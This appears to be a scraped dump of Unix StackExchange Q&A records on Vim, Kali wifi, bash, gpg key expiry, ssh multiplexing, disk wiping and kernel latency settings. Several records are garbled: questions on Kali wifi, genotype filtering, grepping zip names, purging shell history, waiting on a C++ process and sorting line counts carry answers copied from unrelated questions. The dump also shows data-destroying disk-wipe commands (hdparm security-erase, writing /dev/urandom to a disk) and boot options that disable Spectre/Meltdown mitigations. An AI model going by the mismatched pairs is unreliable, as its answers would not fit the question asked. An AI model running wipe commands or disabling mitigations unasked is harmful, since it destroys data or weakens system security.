"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/378957/"
]
} |
549,008 | I want to make a table in vim. Making a horizontal line is easy ______________________________ For the vertical I use this yes "|" | head -10 But the result is bad |
|
|
|
|
|
|
|
| I want something contiguous like the horizontal line. How can I do this? | If your version of Vim is compiled with multibyte support and your terminal encoding is set correctly, you may use the Unicode box-drawing characters , which include horizontal and vertical lines as well as several varieties of intersections and blocks. Vim defines some default digraphs for these characters, such as vv for │ (to enter a digraph, you use Ctrl - K ; thus in insert mode ^Kvv will insert the character │ at the cursor location). For the full list if your version of Vim supports it, type :digraphs ; for more information on the feature and to search by Unicode character name, type :help digraphs . Depending on your terminal settings and choice of font, however, box-drawing characters may not all render as connected lines, so your mileage may vary. For instance, on my machine vertical lines render as connected in the terminal (using Source Code Pro), but as broken lines in GVim (using DejaVu Sans Mono): | {
"source": [
"https://unix.stackexchange.com/questions/549008",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/80389/"
]
} |
549,012 | I just bought a new HP laptop just for the purpose of installing and learning Kali linux. It had originally windows 10 installed in it. I downloaded and installed the latest version of kali linux. Everything seems to be good and working but when I tried to connect to internet, I can't to it. I can just connect using wired connection. For wireless connection, it says no wifi adapter found. I did not install kali on any virtual machine, my pc is a pure kali linux now straight booted in the drive. When I type iwconfig in the terminal, it just shows me eth0 and lo. It doesn't show wlan0. I tried looking for solution for a whole day now. I tried a method, "download compact wireless" that everyone was showing, I was able to get wlan0 and wlan1, but now the problem is it doesn't detect any wifi. Also when I reboot my laptop, it is gone and I have to do it again, its not saved. I have also realised that bluetooth is also not working. However, the download compact wireless method seems to fix the bluetooth, but ita gone at restart. There are people who said I need to get an adapter, but the laptop should have build in wifi card right? And I directly booted up in the machine, not in any virtual box, so do I really need to buy one? Whats the point of me buying a new laptop just for Kali? Please help me. | If your version of Vim is compiled with multibyte support and your terminal encoding is set correctly, you may use the Unicode box-drawing characters , which include horizontal and vertical lines as well as several varieties of intersections and blocks. Vim defines some default digraphs for these characters, such as vv for │ (to enter a digraph, you use Ctrl - K ; thus in insert mode ^Kvv will insert the character │ at the cursor location). For the full list if your version of Vim supports it, type :digraphs ; for more information on the feature and to search by Unicode character name, type :help digraphs . Depending on your terminal settings and choice of font, however, box-drawing characters may not all render as connected lines, so your mileage may vary. For instance, on my machine vertical lines render as connected in the terminal (using Source Code Pro), but as broken lines in GVim (using DejaVu Sans Mono): | {
"source": [
"https://unix.stackexchange.com/questions/549012",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/379274/"
]
} |
550,415 | I want to write a Bash script, which checks if all directories, stored in an array, exist. If not, the script should create it. Is this a correct way to do it? array1=(
/apache
/apache/bin
/apache/conf
/apache/lib
/www
/www/html
/www/cgi-bin
/www/ftp
)
if [ ! -d “$array1” ]; then
mkdir $array1
else
break
fi | Just use: mkdir -p -- "${array1[@]}" That will also create intermediary directory components if need be so your array can also be shortened to only include the leaf directories: array1=(
/apache/bin
/apache/conf
/apache/lib
/www/html
/www/cgi-bin
/www/ftp
) Which you could also write: array1=(
/apache/{bin,conf,lib}
/www/{html,cgi-bin,ftp}
) The [[ -d ... ]] || mkdir ... type of approaches in general introduce TOCTOU race conditions and are better avoided wherever possible (though in this particular case it's unlikely to be a problem). | {
"source": [
"https://unix.stackexchange.com/questions/550415",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/380533/"
]
} |
550,951 | I want to test some physical links in a setup. The software tooling that I can use to test this require a block device to read/write from/to. The block devices I have available can't saturate the physical link so I can't fully test it. I know I can setup a virtual block device which is backed by a file. So my idea was to somehow setup a virtual block device to /dev/null but the problem is of course that I can't read from it. Is there a way I could setup a virtual block device that writes to /dev/null but just returns always zero when read? Thank you for any help! | https://wiki.gentoo.org/wiki/Device-mapper#Zero See Documentation/device-mapper/zero.txt for usage. This target has no target-specific parameters. The "zero" target creates a device that functions similarly to /dev/zero: All reads return binary zero, and all writes are discarded. Normally used in tests [...] This creates a 1GB (1953125-sector) zero target: root# dmsetup create 1gb-zero --table '0 1953125 zero'
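A quick sanity check of the new device (a sketch; 1953125 sectors of 512 bytes is exactly 1,000,000,000 bytes, and any read from /dev/mapper/1gb-zero returns zeroes):
root# blockdev --getsize64 /dev/mapper/1gb-zero
1000000000 | {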
"source": [
"https://unix.stackexchange.com/questions/550951",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/350749/"
]
} |
552,188 | I would like to remove empty lines from the beginning and the end of file, but not remove empty lines between non-empty lines in the middle. I think sed or awk would be the solution. Source: 1:
2:
3:line1
4:
5:line2
6:
7:
8: Output: 1:line1
2:
3:line2 | Try this. To remove blank lines from the beginning of a file: sed -i '/./,$!d' filename To remove blank lines from the end of a file: sed -i -e :a -e '/^\n*$/{$d;N;ba' -e '}' file To remove blank lines from the beginning and end of a file: sed -i -e '/./,$!d' -e :a -e '/^\n*$/{$d;N;ba' -e '}' file From man sed , -e script, --expression=script -> add the script to the commands to be executed b label -> Branch to label; if label is omitted, branch to end of script. a -> Append text after a line (alternative syntax). $ -> Match the last line. n N -> Add a newline to the pattern space, then append the next line of input to the pattern space. If there is no more input then sed exits without processing any more commands.
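A quick check on the sample from the question (run without -i here so the result is printed instead of written back to the file):
$ printf '\n\nline1\n\nline2\n\n\n\n' > file
$ sed -e '/./,$!d' -e :a -e '/^\n*$/{$d;N;ba' -e '}' file
line1

line2 | {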
"source": [
"https://unix.stackexchange.com/questions/552188",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/215365/"
]
} |
552,436 | :>filename.txt For example: root@box$ dd if=/dev/zero of=file.txt count=1024 bs=1024
1024+0 records in
1024+0 records out
1048576 bytes (1.0 MB, 1.0 MiB) copied, 0.00536175 s, 196 MB/s
root@box$ ll
total 1024
-rw-r--r-- 1 root root 1048576 Nov 15 14:40 file.txt
root@box$ :>file.txt
root@box$ ll
total 0
-rw-r--r-- 1 root root 0 Nov 15 14:40 file.txt Is this different from an rm ? Does it operate faster or slower than other similar means of zeroing a file or deleting it? | As you have discovered, this just empties the file contents (it truncates the file); that is different from rm as rm would actually remove the file altogether. Additionally, :>file.txt will actually create the file if it didn't already exist. : is a "do nothing command" that will exit with success and produce no output, so it's simply a short method to empty a file. In most shells, you could simply do >file.txt to get the same result. It also could be marginally faster than other methods such as echo >file.txt as echo could potentially be an external command. Additionally, echo >file.txt would put a blank line in file.txt where :>file.txt would make the file have no contents whatsoever. | {
"source": [
"https://unix.stackexchange.com/questions/552436",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/137794/"
]
} |
552,707 | I renewed my gpg key pair, but I am still receiving the following error from gpg. gpg: WARNING: Your encryption subkey expires soon.
gpg: You may want to change its expiration date too. How can I renew the subkey? | List your keys. $ gpg --list-keys
...
-------------------------------
pub rsa2048 2019-09-07 [SC] [expires: 2020-11-15]
AF4RGH94ADC84
uid [ultimate] Jill Doe (CX) <[email protected]>
sub rsa2048 2019-09-07 [E] [expired: 2019-09-09]
pub rsa2048 2019-12-13 [SC] [expires: 2020-11-15]
7DAA371777412
uid [ultimate] Jill Doe <[email protected]>
-------------------------------
... We want to edit key AF4RGH94ADC84.
The subkey is the second one in the list that is named ssb $ gpg --edit-key AF4RGH94ADC84
gpg> list
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]> So we want to edit the first subkey (ssb) ssb rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]> When you select key (1), you should see the * next to it such as ssb* . Then you can set the expiration and then save. gpg> key 1
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb* rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]>
gpg> expire
...
Changing expiration time for a subkey.
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 2y
Key expires at Wed 9 Sep 16:20:33 2021 GMT
Is this correct? (y/N) y
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb* rsa2048/56ABDJFDKFN
created: 2019-09-07 expires: 2021-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]>
...
gpg> save Don't forget to save the changes before quitting! | {
"source": [
"https://unix.stackexchange.com/questions/552707",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/19319/"
]
} |
552,713 | I have a big file counting genotype input file. Here is the first few lines: LocusID f nAlleles x y
2L:8347 1 2 44.3166 -12.2373
2L:8347 1 2 39.2667 -6.8333
2L:31184 1 2 39.2667 -6.8333
2L:31184 1 2 39.2667 -6.8333
2L:42788 1 2 39.2667 -6.8333
2L:42788 1 2 39.2667 -6.8333
2L:42887 1 2 39.2667 -6.8333
2L:42887 1 2 39.2667 -6.8333 The first column is locus ID and for each locus I have two rows with identical locus IDs. I want to keep only those which column x and column y are not qual for each locus. here is my desired output from the above example out
2L:8347 1 2 44.3166 -12.2373
2L:8347 1 2 39.2667 -6.8333 Any idea how I can do it? | List your keys. $ gpg --list-keys
...
-------------------------------
pub rsa2048 2019-09-07 [SC] [expires: 2020-11-15]
AF4RGH94ADC84
uid [ultimate] Jill Doe (CX) <[email protected]>
sub rsa2048 2019-09-07 [E] [expired: 2019-09-09]
pub rsa2048 2019-12-13 [SC] [expires: 2020-11-15]
7DAA371777412
uid [ultimate] Jill Doe <[email protected]>
-------------------------------
... We want to edit key AF4RGH94ADC84.
The subkey is the second one in the list that is named ssb $ gpg --edit-key AF4RGH94ADC84
gpg> list
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]> So we want to edit the first subkey (ssb) ssb rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]> When you select key (1), you should see the * next to it such as ssb* . Then you can set the expiration and then save. gpg> key 1
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb* rsa2048/56ABDJFDKFN
created: 2019-09-07 expired: 2019-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]>
gpg> expire
...
Changing expiration time for a subkey.
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0) 2y
Key expires at Wed 9 Sep 16:20:33 2021 GMT
Is this correct? (y/N) y
sec rsa2048/AF4RGH94ADC84
created: 2019-09-07 expires: 2020-11-15 usage: SC
trust: ultimate validity: ultimate
ssb* rsa2048/56ABDJFDKFN
created: 2019-09-07 expires: 2021-09-09 usage: E
[ultimate] (1). Jill Doe (CX) <[email protected]>
...
gpg> save Don't forget to save the changes before quitting! | {
"source": [
"https://unix.stackexchange.com/questions/552713",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/216256/"
]
} |
552,723 | I am trying to do these in a script. I have to run some commands on a remote host. Currently, I am doing this: ssh root@host 'bash -s' < command1
ssh root@host 'bash -s' < command2
ssh root@host 'bash -s' < command3 However, this means that I have to connect to the server repeatedly, which is increasing a lot of time between processing of the commands. I am looking for something like this: varSession=$(ssh root@host 'bash -s')
varSeesion < command1
varSeesion < command2
varSeesion < command3 Again, I need to run these commands via a script. I have taken a look at screen but I am not sure if it can be used in a script. | You can use a ControlMaster and ControlPersist to allow a connection to persist after the command has terminated: When used in conjunction with ControlMaster , specifies that the
master connection should remain open in the background (waiting for
future client connections) after the initial client connection has
been closed. If set to no , then the master connection will not be
placed into the background, and will close as soon as the initial
client connection is closed. If set to yes or 0 , then the master
connection will remain in the background indefinitely (until killed or
closed via a mechanism such as the “ ssh -O exit ”). If set to a time
in seconds, or a time in any of the formats documented in sshd_config(5) , then the backgrounded master connection will
automatically terminate after it has remained idle (with no client
connections) for the specified time. So, the first SSH command will setup a control file for the connection, and the other two will reuse that connection via that control file. Your ~/.ssh/config should have something like: Host host
User root
ControlMaster auto
ControlPath /tmp/ssh-control-%C
ControlPersist 30 # or some safe timeout And your script won't need any other changes.
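To confirm that later commands really do reuse the master connection, you can query it (a sketch; the pid in the output is illustrative):
$ ssh root@host uptime # first call creates the control socket
$ ssh -O check root@host
Master running (pid=12345) | {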
"source": [
"https://unix.stackexchange.com/questions/552723",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/376320/"
]
} |
552,809 | I'd like to know if apk add is capable of automatically assuming yes to any prompts when installing a new package on Alpine Linux? I'm familiar with running something like apt-get install -y curl on Ubuntu and wondering if there's an equivalent command for my use case. | apk does not need a --yes argument as it is designed to run non-interactively from the get-go and does not prompt the user unless the -i / --interactive argument is given (and then only for "certain operations"). Ref apk --help --verbose . | {
"source": [
"https://unix.stackexchange.com/questions/552809",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/382529/"
]
} |
553,143 | I need to securely erase harddisks from time to time and have used a variety of tools to do this: cat /dev/zero > /dev/disk cat /dev/urandom > /dev/disk shred badblocks -w DBAN All of these have in common that they take ages to run. In one case cat /dev/urandom > /dev/disk killed the disk, apparently overheating it. Is there a "good enough" approach to achieve that any data on the disk is made unusable in a timely fashion? Overwriting superblocks and a couple of strategically important blocks or somesuch? The disks (both, spinning and ssd) come from donated computers and will be used to install Linux-Desktops on them afterwards, handed out to people who can't afford to buy a computer, but need one. The disks of the donated computers will usually not have been encrypted. And sometimes donors don't even think of deleting files beforehand. Update : From the answers that have come in so far, it seems there is no cutting corners.
My best bet is probably setting up a lab-computer to erase multiple disks at once. One more reason to ask big companies for donations :-) Thanks everyone! | Overwriting the superblock or partition table just makes it inconvenient to reconstruct the data, which is obviously still there if you just do a hex dump. Hard disks have a built-in erasing feature: ATA Secure Erase , which you can activate using hdparm : Pick a password (any password): hdparm --user-master u --security-set-pass hunter1 /dev/sd X Initiate erasure: hdparm --user-master u --security-erase hunter1 /dev/sd X Since this is a built-in feature, it is unlikely that you'll find a faster method that actually offers real erasure. (It's up to you, though, to determine whether it meets your level of paranoia.) Alternatively, use the disk with full-disk encryption, then just throw away the key when you want to dispose of the data. | {
"source": [
"https://unix.stackexchange.com/questions/553143",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/364705/"
]
} |
553,146 | I was wondering about a clean elegant way to do the following:
Let's say I have written a C++ program, called foo , running inside as part of a shell script, called bar.sh . I'd like for the shell script to run foo as a background process, and then wait until the foo execution reaches a line of my choosing, at which point bar should continue execution. For the sake of clarity, here's a dummy example of bar.sh : #!/bin/bash
./foo
wait
echo "WAKING UP" Here is foo : #include <iostream>
int main(){
for (int i = 0; i < 1000000; i++){
std::cout << i << std::endl;
if (i == 50){
//Wake up bash!
}
}
} I want to modify foo and/or bar so that the wait command in bar will stop when foo is at iteration 50 let's say. So when the for loop in foo reaches i = 50 , bar should then awaken and print WAKING UP. Of course, foo can continue to keep running. How can I modify these programs to achieve this sort of effect? | Overwriting the superblock or partition table just makes it inconvenient to reconstruct the data, which is obviously still there if you just do a hex dump. Hard disks have a built-in erasing feature: ATA Secure Erase , which you can activate using hdparm : Pick a password (any password): hdparm --user-master u --security-set-pass hunter1 /dev/sd X Initiate erasure: hdparm --user-master u --security-erase hunter1 /dev/sd X Since this is a built-in feature, it is unlikely that you'll find a faster method that actually offers real erasure. (It's up to you, though, to determine whether it meets your level of paranoia.) Alternatively, use the disk with full-disk encryption, then just throw away the key when you want to dispose of the data. | {
"source": [
"https://unix.stackexchange.com/questions/553146",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/292999/"
]
} |
553,731 | We can see that the synopsis of rm command is: rm [OPTION]... [FILE]... Doesn't it mean that we can use only rm command without any option or argument? When I run the command rm on its own, the terminal then shows the following error: rm: missing operand
Try 'rm --help' for more information. Can anyone tell me why this is the case? | The standard synopsis for the rm utility is specified in the POSIX standard 1&2 as rm [-iRr] file...
rm -f [-iRr] [file...] In its first form, it does require at least one file operand, but in its second form it does not. Doing rm -f with no file operands is not an error: $ rm -f
$ echo "$?"
0 ... but it just doesn't do very much. The standard says that for the -f option, the rm utility should... Do not prompt for confirmation. Do not write diagnostic messages or modify the exit status in the case of no file operands, or in the case of operands that do not exist. Any previous occurrences of the -i option shall be ignored. This confirms that it must be possible to run rm -f without any pathname operands and that this is not something that makes rm exit with a diagnostic message nor a non-zero exit status. This fact is very useful in a script that tries to delete a number of files as rm -f -- "$@" where "$@" is a list of pathnames that may or may not be empty, or that may contain pathnames that do not exist. ( rm -f will still generate a diagnostic message and exit with a non-zero exit status if there are permission issues preventing a named file from being removed.) Running the utility with neither option nor pathname operands is an error though: $ rm
usage: rm [-dfiPRrv] file ...
$ echo "$?"
1 The same holds true for GNU rm (the above shows OpenBSD rm ) and other implementations of the same utility, but the exact diagnostic message and the non-zero exit-status may be different (on Solaris the value is 2, and on macOS it's 64, for example). In conclusion, the GNU rm manual may just be a bit imprecise as it's true that with some option ( -f , which is an optional option), the pathname operand is optional. 1 since the 2016 edition, after resolution of this bug , see the previous edition for reference. 2 POSIX is the standard that defines what a Unix system is and how it behaves. This standard is published by The Open Group . See also the question " What exactly is POSIX? ". | {
"source": [
"https://unix.stackexchange.com/questions/553731",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/383308/"
]
} |
553,980 | I can't find any good information on the rt and lowlatency Linux kernels. I am wondering why anybody would not want to use a lowlatency kernel. Also, if anyone can tell what the specific differences are, that would be great too. | The different configurations, “generic”, “lowlatency” (as configured in Ubuntu), and RT (“real-time”), are all about balancing throughput versus latency. Generic kernels favour throughput over latency, the others favour latency over throughput. Thus users who need throughput more than they need low latency wouldn’t choose a low latency kernel. Compared to the generic configuration, the low-latency kernel changes the following settings: IRQs are threaded by default, meaning that more IRQs (still not all IRQs) can be pre-empted, and they can also be prioritised and have their CPU affinity controlled; pre-emption is enabled throughout the kernel ( CONFIG_PREEMPT instead of CONFIG_PREEMPT_VOLUNTARY ); the latency debugging tools are enabled, so that the user can determine what kernel operations are blocking progress; the timer frequency is set to 1000 Hz instead of 250 Hz . RT kernels add a number of patches to the mainline kernel, and a few more configuration tweaks. The purpose of most of those patches is to allow more opportunities for pre-emption, by removing or splitting up locks, and to reduce the amount of time the kernel spends handling uninterruptible tasks (notably, by improving the logging mechanisms and using them less). The goal of all this is to allow the kernel to meet deadlines , i.e. ensure that, when it is required to handle something, it isn’t busy doing something else; this isn’t the same as high throughput or low latency, but fixing latency issues helps. The generic kernels, as configured by default in most distributions, are designed to be a “sensible” compromise: they try to ensure that no single task can monopolise the system for too long, and that tasks can switch reasonably frequently, but without compromising throughput — because the more time the kernel spends considering whether to switch tasks (inside or outside the kernel), or handling interrupts, the less time the system as a whole can spend “working”. That compromise isn’t good enough for latency-sensitive workloads such as real-time audio or video processing: for those, low-latency kernels provide lower latencies at the expense of some throughput. And for real-time requirements, the real-time kernels remove as many low-latency-blockers as possible, at the expense of more throughput. Main-stream distributions of Linux are mostly installed on servers, where traditionally latency hasn’t been considered all that important (although if you do percentile performance analysis, and care about top percentile performance, you might disagree), so the default kernels are quite conservative. Desktop users should probably use the low-latency kernels, as suggested by the kernel’s own documentation. In fact, the more low-latency kernels are used, the more feedback there will be on their relevance, which helps get generally-applicable improvements into the default kernel configurations; the same goes for the RT kernels (many of the RT patches are intended, at some point, for the mainstream kernel). This presentation on the topic provides quite a lot of background. Since version 5.12 of the Linux kernel, “dynamic preemption” can be enabled; this allows the default preemption model to be overridden on the kernel command-line, using the preempt= parameter. 
This currently supports none (server), voluntary (desktop), and full (low-latency desktop). | {
"source": [
"https://unix.stackexchange.com/questions/553980",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/73671/"
]
} |
554,007 | All I need is the Zip file name.
In the first step I searched for the author: egrep -ni -B1 --color "$autor: test_autor" file_search_v1.log > result1.log which worked; the result was: zip: /var/www/dir_de/html/dir1/dir2/7890971.zip author: test_autor zip: /var/www/dir_de/html/dir1/dir2/10567581.zip author: test_autor But, as mentioned above, I only need the zip file name.
In the second step I tried to filter the result of the first search again: egrep -ni -B1 --color "$autor: test_autor" file_search_v1.log | xargs grep -i -o "\/[[:digit:]]]\.zip" to extract only the filename, but unfortunately this does not work. My question:
How should the second grep filter "look" so that I only get the zip file name? | | {
"source": [
"https://unix.stackexchange.com/questions/554007",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/321126/"
]
} |
554,008 | Is there any command or way to remove all entries from the bash shell history containing a particular string? This will be useful for removing commands in the history that contain passwords.
I know we can remove each history entry by its number, but the issue is that it deletes only one entry at a time and I need to look up the number each time to remove another entry. E.g. the history command shows 5 entries containing the password abcabc and I want to remove all the entries containing the string abcabc: 975 2019-03-15 11:20:30 ll
976 2019-03-15 11:20:33 ll cd
977 2019-03-15 11:20:36 ll CD
978 2019-03-15 11:20:45 chown test1:test1 CD
979 2019-03-15 11:20:53 chown test1:test1 ./CD
980 2019-03-15 11:20:57 chown test1:test1 .\CD
981 2019-03-15 11:22:04 cd /tmp/logs/
982 2019-06-07 10:36:33 su test1
983 2019-08-22 08:35:10 su user1
984 2019-08-22 08:35:15 /opt/abc/legacy.exe -password abcabc
985 2019-09-24 07:20:45 cd /opt/test1/v6r2017x
986 2019-09-24 07:20:46 ll
987 2019-09-24 07:21:18 cd /tmp/
988 2019-09-24 07:21:19 ll
989 2019-09-24 07:21:24 cd linux_a64/
990 2019-09-24 07:21:25 /opt/abc/legacy.exe -password abcabc
991 2019-09-24 07:24:03 cd build/
992 2019-09-24 07:24:04 ll
993 2019-09-24 07:24:07 cd ..
994 2019-09-24 07:24:10 /opt/abc/legacy.exe -password abcabc
995 2019-09-24 07:24:15 cd someapp/bin
996 2019-09-24 07:24:21 ll
997 2019-09-24 07:24:33 cd .
998 2019-09-24 07:24:35 cd ..
999 2019-09-24 07:24:36 ll Tried following command which gave error as given below servername:~ # sed -i 'g/abcabc/d' /home/user1/.bash_history
sed: -e expression #1, char 2: extra characters after command Expectation : No error and all the entries containing string abcabc should be removed. | | {
"source": [
"https://unix.stackexchange.com/questions/554008",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/266985/"
]
} |
554,908 | Can I disable Spectre and Meltdown mitigation features in Ubuntu 18.04LTS? I want to test how much more performance I gain when I disable these two features in Linux, and if the performance is big, to make it permanently. | A number of kernel boot parameters are available to disable or fine-tune hardware vulnerability mitigations: for Spectre v1 and v2 : nospectre_v1 (x86, PowerPC), nospectre_v2 (x86, PowerPC, S/390, ARM64), spectre_v2_user=off (x86) for SSB: spec_store_bypass_disable=off (x86, PowerPC), ssbd=force-off (ARM64) for L1TF : l1tf=off (x86) for MDS : mds=off (x86) for TAA : tsx_async_abort=off for iTLB multihit : kvm.nx_huge_pages=off for SRBDS : srbds=off for retbleed: retbleed=off KPTI can be disabled with nopti (x86, PowerPC) or kpti=0 (ARM64) A meta-parameter, mitigations , was introduced in 5.2 and back-ported to 5.1.2, 5.0.16, and 4.19.43 (and perhaps others). It can be used to control all mitigations, on all architectures, as follows: mitigations=off will disable all optional CPU mitigations; mitigations=auto (the default setting) will mitigate all known CPU vulnerabilities, but leave SMT enabled (if it is already); mitigations=auto,nosmt will mitigate all known CPU vulnerabilities and disable SMT if appropriate. Some of these can be toggled at runtime; see the linked documentation for details. | {
"source": [
"https://unix.stackexchange.com/questions/554908",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/149626/"
]
} |
555,047 | I have a directory foo with several files: .
└── foo
├── a.txt
└── b.txt and I want to move it into a directory with the same name: .
└── foo
└── foo
├── a.txt
└── b.txt I'm currently creating a temporary directory bar , move foo into bar and rename bar to foo afterwards: mkdir bar
mv foo bar
mv bar foo But this feels a little cumbersome and I have to pick a name for bar that's not already taken. Is there a more elegant or straight-forward way to achieve this? I'm on macOS if that matters. | To safely create a temporary directory in the current directory, with a name that is not already taken, you can use mktemp -d like so: tmpdir=$(mktemp -d "$PWD"/tmp.XXXXXXXX) # using ./tmp.XXXXXXXX would work too The mktemp -d command will create a directory at the given path, with the X -es at the end of the pathname replaced by random alphanumeric characters. It will return the pathname of the directory that was created, and we store this value in tmpdir . 1 This tmpdir variable could then be used when following the same procedure that you are already doing, with bar replaced by "$tmpdir" : mv foo "$tmpdir"
mv "$tmpdir" foo
unset tmpdir The unset tmpdir at the end just removes the variable. 1 Usually, one should be able to set the TMPDIR environment variable to a directory path where one wants to create temporary files or directories with mktemp , but the utility on macOS seems to work subtly differently with regards to this than the same utility on other BSD systems, and will create the directory in a totally different location. The above would however work on macOS. Using the slightly more convenient tmpdir=$(TMPDIR=$PWD mktemp -d) or even tmpdir=$(TMPDIR=. mktemp -d) would only be an issue on macOS if the default temporary directory was on another partition and the foo directory contained a lot of data (i.e. it would be slow). | {
"source": [
"https://unix.stackexchange.com/questions/555047",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/295479/"
]
} |
555,208 | I recently purchased a i5-9600K . Which is supposed to run 6 cores and 6 threads (hyperthreading), when I take a look into /proc/cpuinfo the ht flag is on, and checking a tool like htop only shows 6 cores, as you can see in the image below. I've used other Intel and AMD processors, and usually when the product says 6 cores/6 threads the total amount is 12 , but in this case I see just 6 . Am I wrong or what could be the problem? Thank you! | If you scroll down on your CPU’s Ark page , you’ll see that it says Intel® Hyper-Threading Technology ‡ No Your CPU has six cores, but it doesn’t support hyper-threading, so your htop display is correct. The CPU specifications on Ark show the full thread count, there’s no addition or multiplication involved; see for example the Xeon E3-1245v3 for a hyper-threading-capable CPU (four cores, two threads per core, for eight threads in total). The ht moniker given to the underlying CPUID flag is somewhat misleading: in Intel’s manual (volume 3A, section 8.6), it’s described as “Indicates when set that the physical package is capable of supporting Intel Hyper-Threading Technology and/or multiple cores”. So its presence indicates that the CPU supports hyper-threads (even if they’re disabled), or contains multiple cores in the same package, or both. To determine what is really present, you need to enumerate the CPUs in the system, using firmware-provided information, and use the information given to figure out whether there are multiple logical cores, on how many physical cores, on how many sockets, etc. Depending on the CPU, a “CPU” shown in htop (and other tools) can be a thread (on a hyper-threading system), a physical core (on a non-hyper-threading system), or even a full package (on a non-hyper-threading, single-core system). The Linux kernel does all this detection for you, and you can see the result using for example lscpu . At least your CPU isn’t affected by any of the hyperthreading-related vulnerabilities! | {
"source": [
"https://unix.stackexchange.com/questions/555208",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/384590/"
]
} |
555,257 | I am trying to get x amount of file names printed from highest line count to lowest. ATM i have this wc -l /etc/*.conf |sort -rn | head -6 | tail -5 | and i get this 543 /etc/ltrace.conf
523 /etc/sensors3.conf
187 /etc/pnm2ppa.conf
144 /etc/ca-certificates.conf Now this would be ok but i only need the names, is there any way of removing the number of lines? | | {
"source": [
"https://unix.stackexchange.com/questions/555257",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/384642/"
]
} |
555,746 | Because I spend most of my life in the IPython shell, I have a bad habit of prepending terminal commands with exclamation points. Usually, this just leads to an error, but sometimes, it causes something bad to happen. Can I effectively disable the ! functionality in my terminal? And would this risk interfering with any scripts? | In interactive shells, by default, ! is used for history expansion: the shell will look for a command matching the text following ! , and execute that. As indicated in this answer to Can't use exclamation mark (!) in bash? shells allow history expansion to be disabled: Bash: set +H Zsh: set -K If you never want to use history expansion driven by exclamation marks, you can add these to your shell’s startup scripts. These won’t cause ! to be ignored, but they will avoid running commands from your history. !command will complain that !command doesn’t exist. Shell scripts aren’t affected by these settings, they get their own shells with a non-interactive configuration (which doesn’t include history expansion by default). | {
"source": [
"https://unix.stackexchange.com/questions/555746",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/181903/"
]
} |
556,441 | What specifically can Linux do when it has swap that it can't without swap? For this question I want to focus on the difference between for example, a Linux PC with 32 GB RAM and no swap vs. a near identical Linux PC with 16 GB RAM with 16 GB swap. Note I am not interested in the "yes, but you could see X improvement if you add swap to the 32 GB PC" . That's off-topic for this question. I first encountered the opinion that adding swap can be better than adding RAM in comments to an earlier problem . I have of course read through this: Do I need swap space if I have more than enough amount of RAM? and... Answers are mostly focussed on adding swap, for example discussing disk caching where adding RAM would of course also extend the disk cache. There is some mention of defragmentation only being possible with swap, but I can't find evidence to back this up. I see some reference to MAP_NORESERVE for mmap , but this seems a very specific and obscure risk only associated with OOM situations and possibly only private mmap. Swap is often seen as a cheap way to extend memory or improve performance. But when mass producing embedded Linux devices this is turned on its head... ... In that case swap will wear flash memory, causing it to fail years before the end of warranty. Where doubling the RAM is a couple of extra dollars on the device. Note that's eMMC flash NOT an SSD! . Typically eMMC flash does not have wearleveling technology meaning it wears MUCH faster than SSDs There does seem to be a lot of hotly contested opinion on this matter . I am really looking for dry facts on capabilities, not "should you / shouldn't you" opinions. What can be done with swap which would not also be done by adding RAM? | Hibernation (or suspend to disk). Real hibernation powers off the system completely, so contents of RAM are lost, and you have to save the state to some persistent storage. AKA Swap. Unlike Windows with hiberfil.sys and pagefile.sys , Linux uses swap space for both over-committed memory and hibernation. On the other hand, hibernation seems a bit finicky to get to work well on Linux. Whether you "can" actually hibernate is a different thing. ¯\_(ツ)_/¯ | {
"source": [
"https://unix.stackexchange.com/questions/556441",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/20140/"
]
} |
